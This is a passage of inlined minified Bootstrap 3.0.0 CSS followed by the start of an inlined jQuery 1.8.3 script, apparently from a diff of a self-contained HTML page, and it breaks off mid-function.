.alert-link{color:#356635}.alert-info{color:#3a87ad;background-color:#d9edf7;border-color:#bce8f1}.alert-info hr{border-top-color:#a6e1ec}.alert-info .alert-link{color:#2d6987}.alert-warning{color:#c09853;background-color:#fcf8e3;border-color:#fbeed5}.alert-warning hr{border-top-color:#f8e5be}.alert-warning .alert-link{color:#a47e3c}.alert-danger{color:#b94a48;background-color:#f2dede;border-color:#eed3d7}.alert-danger hr{border-top-color:#e6c1c7}.alert-danger .alert-link{color:#953b39}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-moz-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-o-keyframes progress-bar-stripes{from{background-position:0 0}to{background-position:40px 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}.progress{height:20px;margin-bottom:20px;overflow:hidden;background-color:#f5f5f5;border-radius:4px;-webkit-box-shadow:inset 0 1px 2px rgba(0,0,0,0.1);box-shadow:inset 0 1px 2px rgba(0,0,0,0.1)}.progress-bar{float:left;width:0;height:100%;font-size:12px;color:#fff;text-align:center;background-color:#428bca;-webkit-box-shadow:inset 0 -1px 0 rgba(0,0,0,0.15);box-shadow:inset 0 -1px 0 rgba(0,0,0,0.15);-webkit-transition:width .6s ease;transition:width .6s ease}.progress-striped .progress-bar{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-size:40px 40px}.progress.active .progress-bar{-webkit-animation:progress-bar-stripes 2s linear infinite;-moz-animation:progress-bar-stripes 2s linear infinite;-ms-animation:progress-bar-stripes 2s linear infinite;-o-animation:progress-bar-stripes 2s linear infinite;animation:progress-bar-stripes 2s linear infinite}.progress-bar-success{background-color:#5cb85c}.progress-striped .progress-bar-success{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent)}.progress-bar-info{background-color:#5bc0de}.progress-striped .progress-bar-info{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent)}.progress-bar-warning{background-color:#f0ad4e}.progress-striped .progress-bar-warning{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent)}.progress-bar-danger{background-color:#d9534f}.progress-striped .progress-bar-danger{background-image:-webkit-gradient(linear,0 100%,100% 0,color-stop(0.25,rgba(255,255,255,0.15)),color-stop(0.25,transparent),color-stop(0.5,transparent),color-stop(0.5,rgba(255,255,255,0.15)),color-stop(0.75,rgba(255,255,255,0.15)),color-stop(0.75,transparent),to(transparent));background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:-moz-linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,0.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.15) 50%,rgba(255,255,255,0.15) 75%,transparent 75%,transparent)}.media,.media-body{overflow:hidden;zoom:1}.media,.media .media{margin-top:15px}.media:first-child{margin-top:0}.media-object{display:block}.media-heading{margin:0 0 5px}.media>.pull-left{margin-right:10px}.media>.pull-right{margin-left:10px}.media-list{padding-left:0;list-style:none}.list-group{padding-left:0;margin-bottom:20px}.list-group-item{position:relative;display:block;padding:10px 15px;margin-bottom:-1px;background-color:#fff;border:1px solid #ddd}.list-group-item:first-child{border-top-right-radius:4px;border-top-left-radius:4px}.list-group-item:last-child{margin-bottom:0;border-bottom-right-radius:4px;border-bottom-left-radius:4px}.list-group-item>.badge{float:right}.list-group-item>.badge+.badge{margin-right:5px}a.list-group-item{color:#555}a.list-group-item .list-group-item-heading{color:#333}a.list-group-item:hover,a.list-group-item:focus{text-decoration:none;background-color:#f5f5f5}.list-group-item.active,.list-group-item.active:hover,.list-group-item.active:focus{z-index:2;color:#fff;background-color:#428bca;border-color:#428bca}.list-group-item.active .list-group-item-heading,.list-group-item.active:hover .list-group-item-heading,.list-group-item.active:focus .list-group-item-heading{color:inherit}.list-group-item.active .list-group-item-text,.list-group-item.active:hover .list-group-item-text,.list-group-item.active:focus .list-group-item-text{color:#e1edf7}.list-group-item-heading{margin-top:0;margin-bottom:5px}.list-group-item-text{margin-bottom:0;line-height:1.3}.panel{margin-bottom:20px;background-color:#fff;border:1px solid transparent;border-radius:4px;-webkit-box-shadow:0 1px 1px rgba(0,0,0,0.05);box-shadow:0 1px 1px rgba(0,0,0,0.05)}.panel-body{padding:15px}.panel-body:before,.panel-body:after{display:table;content:" "}.panel-body:after{clear:both}.panel-body:before,.panel-body:after{display:table;content:" "}.panel-body:after{clear:both}.panel>.list-group{margin-bottom:0}.panel>.list-group .list-group-item{border-width:1px 0}.panel>.list-group .list-group-item:first-child{border-top-right-radius:0;border-top-left-radius:0}.panel>.list-group .list-group-item:last-child{border-bottom:0}.panel-heading+.list-group .list-group-item:first-child{border-top-width:0}.panel>.table{margin-bottom:0}.panel>.panel-body+.table{border-top:1px solid #ddd}.panel-heading{padding:10px 15px;border-bottom:1px solid transparent;border-top-right-radius:3px;border-top-left-radius:3px}.panel-title{margin-top:0;margin-bottom:0;font-size:16px}.panel-title>a{color:inherit}.panel-footer{padding:10px 15px;background-color:#f5f5f5;border-top:1px solid #ddd;border-bottom-right-radius:3px;border-bottom-left-radius:3px}.panel-group .panel{margin-bottom:0;overflow:hidden;border-radius:4px}.panel-group .panel+.panel{margin-top:5px}.panel-group .panel-heading{border-bottom:0}.panel-group .panel-heading+.panel-collapse .panel-body{border-top:1px solid #ddd}.panel-group .panel-footer{border-top:0}.panel-group .panel-footer+.panel-collapse .panel-body{border-bottom:1px solid #ddd}.panel-default{border-color:#ddd}.panel-default>.panel-heading{color:#333;background-color:#f5f5f5;border-color:#ddd}.panel-default>.panel-heading+.panel-collapse .panel-body{border-top-color:#ddd}.panel-default>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#ddd}.panel-primary{border-color:#428bca}.panel-primary>.panel-heading{color:#fff;background-color:#428bca;border-color:#428bca}.panel-primary>.panel-heading+.panel-collapse .panel-body{border-top-color:#428bca}.panel-primary>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#428bca}.panel-success{border-color:#d6e9c6}.panel-success>.panel-heading{color:#468847;background-color:#dff0d8;border-color:#d6e9c6}.panel-success>.panel-heading+.panel-collapse .panel-body{border-top-color:#d6e9c6}.panel-success>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#d6e9c6}.panel-warning{border-color:#fbeed5}.panel-warning>.panel-heading{color:#c09853;background-color:#fcf8e3;border-color:#fbeed5}.panel-warning>.panel-heading+.panel-collapse .panel-body{border-top-color:#fbeed5}.panel-warning>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#fbeed5}.panel-danger{border-color:#eed3d7}.panel-danger>.panel-heading{color:#b94a48;background-color:#f2dede;border-color:#eed3d7}.panel-danger>.panel-heading+.panel-collapse .panel-body{border-top-color:#eed3d7}.panel-danger>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#eed3d7}.panel-info{border-color:#bce8f1}.panel-info>.panel-heading{color:#3a87ad;background-color:#d9edf7;border-color:#bce8f1}.panel-info>.panel-heading+.panel-collapse .panel-body{border-top-color:#bce8f1}.panel-info>.panel-footer+.panel-collapse .panel-body{border-bottom-color:#bce8f1}.well{min-height:20px;padding:19px;margin-bottom:20px;background-color:#f5f5f5;border:1px solid #e3e3e3;border-radius:4px;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.05);box-shadow:inset 0 1px 1px rgba(0,0,0,0.05)}.well blockquote{border-color:#ddd;border-color:rgba(0,0,0,0.15)}.well-lg{padding:24px;border-radius:6px}.well-sm{padding:9px;border-radius:3px}.close{float:right;font-size:21px;font-weight:bold;line-height:1;color:#000;text-shadow:0 1px 0 #fff;opacity:.2;filter:alpha(opacity=20)}.close:hover,.close:focus{color:#000;text-decoration:none;cursor:pointer;opacity:.5;filter:alpha(opacity=50)}button.close{padding:0;cursor:pointer;background:transparent;border:0;-webkit-appearance:none}.modal-open{overflow:hidden}body.modal-open,.modal-open .navbar-fixed-top,.modal-open .navbar-fixed-bottom{margin-right:15px}.modal{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;display:none;overflow:auto;overflow-y:scroll}.modal.fade .modal-dialog{-webkit-transform:translate(0,-25%);-ms-transform:translate(0,-25%);transform:translate(0,-25%);-webkit-transition:-webkit-transform .3s ease-out;-moz-transition:-moz-transform .3s ease-out;-o-transition:-o-transform .3s ease-out;transition:transform .3s ease-out}.modal.in .modal-dialog{-webkit-transform:translate(0,0);-ms-transform:translate(0,0);transform:translate(0,0)}.modal-dialog{z-index:1050;width:auto;padding:10px;margin-right:auto;margin-left:auto}.modal-content{position:relative;background-color:#fff;border:1px solid #999;border:1px solid rgba(0,0,0,0.2);border-radius:6px;outline:0;-webkit-box-shadow:0 3px 9px rgba(0,0,0,0.5);box-shadow:0 3px 9px rgba(0,0,0,0.5);background-clip:padding-box}.modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1030;background-color:#000}.modal-backdrop.fade{opacity:0;filter:alpha(opacity=0)}.modal-backdrop.in{opacity:.5;filter:alpha(opacity=50)}.modal-header{min-height:16.428571429px;padding:15px;border-bottom:1px solid #e5e5e5}.modal-header .close{margin-top:-2px}.modal-title{margin:0;line-height:1.428571429}.modal-body{position:relative;padding:20px}.modal-footer{padding:19px 20px 20px;margin-top:15px;text-align:right;border-top:1px solid #e5e5e5}.modal-footer:before,.modal-footer:after{display:table;content:" "}.modal-footer:after{clear:both}.modal-footer:before,.modal-footer:after{display:table;content:" "}.modal-footer:after{clear:both}.modal-footer .btn+.btn{margin-bottom:0;margin-left:5px}.modal-footer .btn-group .btn+.btn{margin-left:-1px}.modal-footer .btn-block+.btn-block{margin-left:0}@media screen and (min-width:768px){.modal-dialog{right:auto;left:50%;width:600px;padding-top:30px;padding-bottom:30px}.modal-content{-webkit-box-shadow:0 5px 15px rgba(0,0,0,0.5);box-shadow:0 5px 15px rgba(0,0,0,0.5)}}.tooltip{position:absolute;z-index:1030;display:block;font-size:12px;line-height:1.4;opacity:0;filter:alpha(opacity=0);visibility:visible}.tooltip.in{opacity:.9;filter:alpha(opacity=90)}.tooltip.top{padding:5px 0;margin-top:-3px}.tooltip.right{padding:0 5px;margin-left:3px}.tooltip.bottom{padding:5px 0;margin-top:3px}.tooltip.left{padding:0 5px;margin-left:-3px}.tooltip-inner{max-width:200px;padding:3px 8px;color:#fff;text-align:center;text-decoration:none;background-color:#000;border-radius:4px}.tooltip-arrow{position:absolute;width:0;height:0;border-color:transparent;border-style:solid}.tooltip.top .tooltip-arrow{bottom:0;left:50%;margin-left:-5px;border-top-color:#000;border-width:5px 5px 0}.tooltip.top-left .tooltip-arrow{bottom:0;left:5px;border-top-color:#000;border-width:5px 5px 0}.tooltip.top-right .tooltip-arrow{right:5px;bottom:0;border-top-color:#000;border-width:5px 5px 0}.tooltip.right .tooltip-arrow{top:50%;left:0;margin-top:-5px;border-right-color:#000;border-width:5px 5px 5px 0}.tooltip.left .tooltip-arrow{top:50%;right:0;margin-top:-5px;border-left-color:#000;border-width:5px 0 5px 5px}.tooltip.bottom .tooltip-arrow{top:0;left:50%;margin-left:-5px;border-bottom-color:#000;border-width:0 5px 5px}.tooltip.bottom-left .tooltip-arrow{top:0;left:5px;border-bottom-color:#000;border-width:0 5px 5px}.tooltip.bottom-right .tooltip-arrow{top:0;right:5px;border-bottom-color:#000;border-width:0 5px 5px}.popover{position:absolute;top:0;left:0;z-index:1010;display:none;max-width:276px;padding:1px;text-align:left;white-space:normal;background-color:#fff;border:1px solid #ccc;border:1px solid rgba(0,0,0,0.2);border-radius:6px;-webkit-box-shadow:0 5px 10px rgba(0,0,0,0.2);box-shadow:0 5px 10px rgba(0,0,0,0.2);background-clip:padding-box}.popover.top{margin-top:-10px}.popover.right{margin-left:10px}.popover.bottom{margin-top:10px}.popover.left{margin-left:-10px}.popover-title{padding:8px 14px;margin:0;font-size:14px;font-weight:normal;line-height:18px;background-color:#f7f7f7;border-bottom:1px solid #ebebeb;border-radius:5px 5px 0 0}.popover-content{padding:9px 14px}.popover .arrow,.popover .arrow:after{position:absolute;display:block;width:0;height:0;border-color:transparent;border-style:solid}.popover .arrow{border-width:11px}.popover .arrow:after{border-width:10px;content:""}.popover.top .arrow{bottom:-11px;left:50%;margin-left:-11px;border-top-color:#999;border-top-color:rgba(0,0,0,0.25);border-bottom-width:0}.popover.top .arrow:after{bottom:1px;margin-left:-10px;border-top-color:#fff;border-bottom-width:0;content:" "}.popover.right .arrow{top:50%;left:-11px;margin-top:-11px;border-right-color:#999;border-right-color:rgba(0,0,0,0.25);border-left-width:0}.popover.right .arrow:after{bottom:-10px;left:1px;border-right-color:#fff;border-left-width:0;content:" "}.popover.bottom .arrow{top:-11px;left:50%;margin-left:-11px;border-bottom-color:#999;border-bottom-color:rgba(0,0,0,0.25);border-top-width:0}.popover.bottom .arrow:after{top:1px;margin-left:-10px;border-bottom-color:#fff;border-top-width:0;content:" "}.popover.left .arrow{top:50%;right:-11px;margin-top:-11px;border-left-color:#999;border-left-color:rgba(0,0,0,0.25);border-right-width:0}.popover.left .arrow:after{right:1px;bottom:-10px;border-left-color:#fff;border-right-width:0;content:" "}.carousel{position:relative}.carousel-inner{position:relative;width:100%;overflow:hidden}.carousel-inner>.item{position:relative;display:none;-webkit-transition:.6s ease-in-out left;transition:.6s ease-in-out left}.carousel-inner>.item>img,.carousel-inner>.item>a>img{display:block;height:auto;max-width:100%;line-height:1}.carousel-inner>.active,.carousel-inner>.next,.carousel-inner>.prev{display:block}.carousel-inner>.active{left:0}.carousel-inner>.next,.carousel-inner>.prev{position:absolute;top:0;width:100%}.carousel-inner>.next{left:100%}.carousel-inner>.prev{left:-100%}.carousel-inner>.next.left,.carousel-inner>.prev.right{left:0}.carousel-inner>.active.left{left:-100%}.carousel-inner>.active.right{left:100%}.carousel-control{position:absolute;top:0;bottom:0;left:0;width:15%;font-size:20px;color:#fff;text-align:center;text-shadow:0 1px 2px rgba(0,0,0,0.6);opacity:.5;filter:alpha(opacity=50)}.carousel-control.left{background-image:-webkit-gradient(linear,0 top,100% top,from(rgba(0,0,0,0.5)),to(rgba(0,0,0,0.0001)));background-image:-webkit-linear-gradient(left,color-stop(rgba(0,0,0,0.5) 0),color-stop(rgba(0,0,0,0.0001) 100%));background-image:-moz-linear-gradient(left,rgba(0,0,0,0.5) 0,rgba(0,0,0,0.0001) 100%);background-image:linear-gradient(to right,rgba(0,0,0,0.5) 0,rgba(0,0,0,0.0001) 100%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000',endColorstr='#00000000',GradientType=1)}.carousel-control.right{right:0;left:auto;background-image:-webkit-gradient(linear,0 top,100% top,from(rgba(0,0,0,0.0001)),to(rgba(0,0,0,0.5)));background-image:-webkit-linear-gradient(left,color-stop(rgba(0,0,0,0.0001) 0),color-stop(rgba(0,0,0,0.5) 100%));background-image:-moz-linear-gradient(left,rgba(0,0,0,0.0001) 0,rgba(0,0,0,0.5) 100%);background-image:linear-gradient(to right,rgba(0,0,0,0.0001) 0,rgba(0,0,0,0.5) 100%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000',endColorstr='#80000000',GradientType=1)}.carousel-control:hover,.carousel-control:focus{color:#fff;text-decoration:none;opacity:.9;filter:alpha(opacity=90)}.carousel-control .icon-prev,.carousel-control .icon-next,.carousel-control .glyphicon-chevron-left,.carousel-control .glyphicon-chevron-right{position:absolute;top:50%;left:50%;z-index:5;display:inline-block}.carousel-control .icon-prev,.carousel-control .icon-next{width:20px;height:20px;margin-top:-10px;margin-left:-10px;font-family:serif}.carousel-control .icon-prev:before{content:'\2039'}.carousel-control .icon-next:before{content:'\203a'}.carousel-indicators{position:absolute;bottom:10px;left:50%;z-index:15;width:60%;padding-left:0;margin-left:-30%;text-align:center;list-style:none}.carousel-indicators li{display:inline-block;width:10px;height:10px;margin:1px;text-indent:-999px;cursor:pointer;border:1px solid #fff;border-radius:10px}.carousel-indicators .active{width:12px;height:12px;margin:0;background-color:#fff}.carousel-caption{position:absolute;right:15%;bottom:20px;left:15%;z-index:10;padding-top:20px;padding-bottom:20px;color:#fff;text-align:center;text-shadow:0 1px 2px rgba(0,0,0,0.6)}.carousel-caption .btn{text-shadow:none}@media screen and (min-width:768px){.carousel-control .icon-prev,.carousel-control .icon-next{width:30px;height:30px;margin-top:-15px;margin-left:-15px;font-size:30px}.carousel-caption{right:20%;left:20%;padding-bottom:30px}.carousel-indicators{bottom:20px}}.clearfix:before,.clearfix:after{display:table;content:" "}.clearfix:after{clear:both}.pull-right{float:right!important}.pull-left{float:left!important}.hide{display:none!important}.show{display:block!important}.invisible{visibility:hidden}.text-hide{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.affix{position:fixed}@-ms-viewport{width:device-width}@media screen and (max-width:400px){@-ms-viewport{width:320px}}.hidden{display:none!important;visibility:hidden!important}.visible-xs{display:none!important}tr.visible-xs{display:none!important}th.visible-xs,td.visible-xs{display:none!important}@media(max-width:767px){.visible-xs{display:block!important}tr.visible-xs{display:table-row!important}th.visible-xs,td.visible-xs{display:table-cell!important}}@media(min-width:768px) and (max-width:991px){.visible-xs.visible-sm{display:block!important}tr.visible-xs.visible-sm{display:table-row!important}th.visible-xs.visible-sm,td.visible-xs.visible-sm{display:table-cell!important}}@media(min-width:992px) and (max-width:1199px){.visible-xs.visible-md{display:block!important}tr.visible-xs.visible-md{display:table-row!important}th.visible-xs.visible-md,td.visible-xs.visible-md{display:table-cell!important}}@media(min-width:1200px){.visible-xs.visible-lg{display:block!important}tr.visible-xs.visible-lg{display:table-row!important}th.visible-xs.visible-lg,td.visible-xs.visible-lg{display:table-cell!important}}.visible-sm{display:none!important}tr.visible-sm{display:none!important}th.visible-sm,td.visible-sm{display:none!important}@media(max-width:767px){.visible-sm.visible-xs{display:block!important}tr.visible-sm.visible-xs{display:table-row!important}th.visible-sm.visible-xs,td.visible-sm.visible-xs{display:table-cell!important}}@media(min-width:768px) and (max-width:991px){.visible-sm{display:block!important}tr.visible-sm{display:table-row!important}th.visible-sm,td.visible-sm{display:table-cell!important}}@media(min-width:992px) and (max-width:1199px){.visible-sm.visible-md{display:block!important}tr.visible-sm.visible-md{display:table-row!important}th.visible-sm.visible-md,td.visible-sm.visible-md{display:table-cell!important}}@media(min-width:1200px){.visible-sm.visible-lg{display:block!important}tr.visible-sm.visible-lg{display:table-row!important}th.visible-sm.visible-lg,td.visible-sm.visible-lg{display:table-cell!important}}.visible-md{display:none!important}tr.visible-md{display:none!important}th.visible-md,td.visible-md{display:none!important}@media(max-width:767px){.visible-md.visible-xs{display:block!important}tr.visible-md.visible-xs{display:table-row!important}th.visible-md.visible-xs,td.visible-md.visible-xs{display:table-cell!important}}@media(min-width:768px) and (max-width:991px){.visible-md.visible-sm{display:block!important}tr.visible-md.visible-sm{display:table-row!important}th.visible-md.visible-sm,td.visible-md.visible-sm{display:table-cell!important}}@media(min-width:992px) and (max-width:1199px){.visible-md{display:block!important}tr.visible-md{display:table-row!important}th.visible-md,td.visible-md{display:table-cell!important}}@media(min-width:1200px){.visible-md.visible-lg{display:block!important}tr.visible-md.visible-lg{display:table-row!important}th.visible-md.visible-lg,td.visible-md.visible-lg{display:table-cell!important}}.visible-lg{display:none!important}tr.visible-lg{display:none!important}th.visible-lg,td.visible-lg{display:none!important}@media(max-width:767px){.visible-lg.visible-xs{display:block!important}tr.visible-lg.visible-xs{display:table-row!important}th.visible-lg.visible-xs,td.visible-lg.visible-xs{display:table-cell!important}}@media(min-width:768px) and (max-width:991px){.visible-lg.visible-sm{display:block!important}tr.visible-lg.visible-sm{display:table-row!important}th.visible-lg.visible-sm,td.visible-lg.visible-sm{display:table-cell!important}}@media(min-width:992px) and (max-width:1199px){.visible-lg.visible-md{display:block!important}tr.visible-lg.visible-md{display:table-row!important}th.visible-lg.visible-md,td.visible-lg.visible-md{display:table-cell!important}}@media(min-width:1200px){.visible-lg{display:block!important}tr.visible-lg{display:table-row!important}th.visible-lg,td.visible-lg{display:table-cell!important}}.hidden-xs{display:block!important}tr.hidden-xs{display:table-row!important}th.hidden-xs,td.hidden-xs{display:table-cell!important}@media(max-width:767px){.hidden-xs{display:none!important}tr.hidden-xs{display:none!important}th.hidden-xs,td.hidden-xs{display:none!important}}@media(min-width:768px) and (max-width:991px){.hidden-xs.hidden-sm{display:none!important}tr.hidden-xs.hidden-sm{display:none!important}th.hidden-xs.hidden-sm,td.hidden-xs.hidden-sm{display:none!important}}@media(min-width:992px) and (max-width:1199px){.hidden-xs.hidden-md{display:none!important}tr.hidden-xs.hidden-md{display:none!important}th.hidden-xs.hidden-md,td.hidden-xs.hidden-md{display:none!important}}@media(min-width:1200px){.hidden-xs.hidden-lg{display:none!important}tr.hidden-xs.hidden-lg{display:none!important}th.hidden-xs.hidden-lg,td.hidden-xs.hidden-lg{display:none!important}}.hidden-sm{display:block!important}tr.hidden-sm{display:table-row!important}th.hidden-sm,td.hidden-sm{display:table-cell!important}@media(max-width:767px){.hidden-sm.hidden-xs{display:none!important}tr.hidden-sm.hidden-xs{display:none!important}th.hidden-sm.hidden-xs,td.hidden-sm.hidden-xs{display:none!important}}@media(min-width:768px) and (max-width:991px){.hidden-sm{display:none!important}tr.hidden-sm{display:none!important}th.hidden-sm,td.hidden-sm{display:none!important}}@media(min-width:992px) and (max-width:1199px){.hidden-sm.hidden-md{display:none!important}tr.hidden-sm.hidden-md{display:none!important}th.hidden-sm.hidden-md,td.hidden-sm.hidden-md{display:none!important}}@media(min-width:1200px){.hidden-sm.hidden-lg{display:none!important}tr.hidden-sm.hidden-lg{display:none!important}th.hidden-sm.hidden-lg,td.hidden-sm.hidden-lg{display:none!important}}.hidden-md{display:block!important}tr.hidden-md{display:table-row!important}th.hidden-md,td.hidden-md{display:table-cell!important}@media(max-width:767px){.hidden-md.hidden-xs{display:none!important}tr.hidden-md.hidden-xs{display:none!important}th.hidden-md.hidden-xs,td.hidden-md.hidden-xs{display:none!important}}@media(min-width:768px) and (max-width:991px){.hidden-md.hidden-sm{display:none!important}tr.hidden-md.hidden-sm{display:none!important}th.hidden-md.hidden-sm,td.hidden-md.hidden-sm{display:none!important}}@media(min-width:992px) and (max-width:1199px){.hidden-md{display:none!important}tr.hidden-md{display:none!important}th.hidden-md,td.hidden-md{display:none!important}}@media(min-width:1200px){.hidden-md.hidden-lg{display:none!important}tr.hidden-md.hidden-lg{display:none!important}th.hidden-md.hidden-lg,td.hidden-md.hidden-lg{display:none!important}}.hidden-lg{display:block!important}tr.hidden-lg{display:table-row!important}th.hidden-lg,td.hidden-lg{display:table-cell!important}@media(max-width:767px){.hidden-lg.hidden-xs{display:none!important}tr.hidden-lg.hidden-xs{display:none!important}th.hidden-lg.hidden-xs,td.hidden-lg.hidden-xs{display:none!important}}@media(min-width:768px) and (max-width:991px){.hidden-lg.hidden-sm{display:none!important}tr.hidden-lg.hidden-sm{display:none!important}th.hidden-lg.hidden-sm,td.hidden-lg.hidden-sm{display:none!important}}@media(min-width:992px) and (max-width:1199px){.hidden-lg.hidden-md{display:none!important}tr.hidden-lg.hidden-md{display:none!important}th.hidden-lg.hidden-md,td.hidden-lg.hidden-md{display:none!important}}@media(min-width:1200px){.hidden-lg{display:none!important}tr.hidden-lg{display:none!important}th.hidden-lg,td.hidden-lg{display:none!important}}.visible-print{display:none!important}tr.visible-print{display:none!important}th.visible-print,td.visible-print{display:none!important}@media print{.visible-print{display:block!important}tr.visible-print{display:table-row!important}th.visible-print,td.visible-print{display:table-cell!important}.hidden-print{display:none!important}tr.hidden-print{display:none!important}th.hidden-print,td.hidden-print{display:none!important}}</style><!-- END extlib/css/bootstrap-3.0.0.min.css -->
-<!-- START extlib/js/jquery-1.8.3.min.js -->
-<script type="text/javascript">/*! jQuery v1.8.3 jquery.com | jquery.org/license */
-(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t,r)}return v.grep(e,function(e,r){return v.inArray(e,t)>=0===n})}function lt(e){var t=ct.split("|"),n=e.createDocumentFragment();if(n.createElement)while(t.length)n.createElement(t.pop());return n}function Lt(e,t){return e.getElementsByTagName(t)[0]||e.appendChild(e.ownerDocument.createElement(t))}function At(e,t){if(t.nodeType!==1||!v.hasData(e))return;var n,r,i,s=v._data(e),o=v._data(t,s),u=s.events;if(u){delete o.handle,o.events={};for(n in u)for(r=0,i=u[n].length;r<i;r++)v.event.add(t,n,u[n][r])}o.data&&(o.data=v.extend({},o.data))}function Ot(e,t){var n;if(t.nodeType!==1)return;t.clearAttributes&&t.clearAttributes(),t.mergeAttributes&&t.mergeAttributes(e),n=t.nodeName.toLowerCase(),n==="object"?(t.parentNode&&(t.outerHTML=e.outerHTML),v.support.html5Clone&&e.innerHTML&&!v.trim(t.innerHTML)&&(t.innerHTML=e.innerHTML)):n==="input"&&Et.test(e.type)?(t.defaultChecked=t.checked=e.checked,t.value!==e.value&&(t.value=e.value)):n==="option"?t.selected=e.defaultSelected:n==="input"||n==="textarea"?t.defaultValue=e.defaultValue:n==="script"&&t.text!==e.text&&(t.text=e.text),t.removeAttribute(v.expando)}function Mt(e){return typeof e.getElementsByTagName!="undefined"?e.getElementsByTagName("*"):typeof e.querySelectorAll!="undefined"?e.querySelectorAll("*"):[]}function _t(e){Et.test(e.type)&&(e.defaultChecked=e.checked)}function Qt(e,t){if(t in e)return t;var 